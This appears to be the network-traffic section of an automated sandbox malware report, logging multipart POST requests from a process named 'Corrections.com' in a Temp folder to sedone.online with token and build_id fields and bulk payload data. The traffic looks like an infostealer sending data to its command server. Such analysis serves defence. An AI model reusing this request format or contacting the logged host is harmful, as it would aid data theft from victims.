                                                                                                                                                                                                                                                                                          2024-12-15 19:48:00 UTC581OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                          2024-12-15 19:48:02 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                          Date: Sun, 15 Dec 2024 19:48:01 GMT
                                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                          2024-12-15 19:48:02 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                          Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          18192.168.2.449779116.203.12.2414435496C:\Users\user\AppData\Local\Temp\628056\Corrections.com
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          2024-12-15 19:48:03 UTC328OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----S0RQI589Z58YU37GVKNO
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                          Host: sedone.online
                                                                                                                                                                                                                                                                                          Content-Length: 153381
                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                          2024-12-15 19:48:03 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 53 30 52 51 49 35 38 39 5a 35 38 59 55 33 37 47 56 4b 4e 4f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 36 65 33 30 36 38 66 63 61 35 39 35 39 61 33 39 63 36 61 39 32 37 65 37 37 66 61 31 61 65 32 0d 0a 2d 2d 2d 2d 2d 2d 53 30 52 51 49 35 38 39 5a 35 38 59 55 33 37 47 56 4b 4e 4f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 39 36 30 30 30 39 64 64 38 37 35 37 66 63 34 63 37 61 36 35 64 63 65 65 66 32 39 35 66 36 65 30 0d 0a 2d 2d 2d 2d 2d 2d 53 30 52 51 49 35 38 39 5a 35 38 59 55 33 37 47 56 4b 4e 4f 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                          Data Ascii: ------S0RQI589Z58YU37GVKNOContent-Disposition: form-data; name="token"f6e3068fca5959a39c6a927e77fa1ae2------S0RQI589Z58YU37GVKNOContent-Disposition: form-data; name="build_id"960009dd8757fc4c7a65dceef295f6e0------S0RQI589Z58YU37GVKNOCont
                                                                                                                                                                                                                                                                                          2024-12-15 19:48:03 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                          2024-12-15 19:48:03 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                          2024-12-15 19:48:03 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                          2024-12-15 19:48:03 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                          2024-12-15 19:48:03 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                          2024-12-15 19:48:03 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                          2024-12-15 19:48:03 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                          2024-12-15 19:48:03 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                          2024-12-15 19:48:03 UTC6186OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                          2024-12-15 19:48:05 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                          Date: Sun, 15 Dec 2024 19:48:05 GMT
                                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                          Connection: close


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          19192.168.2.449785116.203.12.2414435496C:\Users\user\AppData\Local\Temp\628056\Corrections.com
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          2024-12-15 19:48:04 UTC328OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----47YMOHDTJW4EUAAA1VKF
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                          Host: sedone.online
                                                                                                                                                                                                                                                                                          Content-Length: 393697
                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                          2024-12-15 19:48:04 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 34 37 59 4d 4f 48 44 54 4a 57 34 45 55 41 41 41 31 56 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 36 65 33 30 36 38 66 63 61 35 39 35 39 61 33 39 63 36 61 39 32 37 65 37 37 66 61 31 61 65 32 0d 0a 2d 2d 2d 2d 2d 2d 34 37 59 4d 4f 48 44 54 4a 57 34 45 55 41 41 41 31 56 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 39 36 30 30 30 39 64 64 38 37 35 37 66 63 34 63 37 61 36 35 64 63 65 65 66 32 39 35 66 36 65 30 0d 0a 2d 2d 2d 2d 2d 2d 34 37 59 4d 4f 48 44 54 4a 57 34 45 55 41 41 41 31 56 4b 46 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                          Data Ascii: ------47YMOHDTJW4EUAAA1VKFContent-Disposition: form-data; name="token"f6e3068fca5959a39c6a927e77fa1ae2------47YMOHDTJW4EUAAA1VKFContent-Disposition: form-data; name="build_id"960009dd8757fc4c7a65dceef295f6e0------47YMOHDTJW4EUAAA1VKFCont
                                                                                                                                                                                                                                                                                          2024-12-15 19:48:04 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                          2024-12-15 19:48:04 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                          2024-12-15 19:48:04 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                          2024-12-15 19:48:04 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
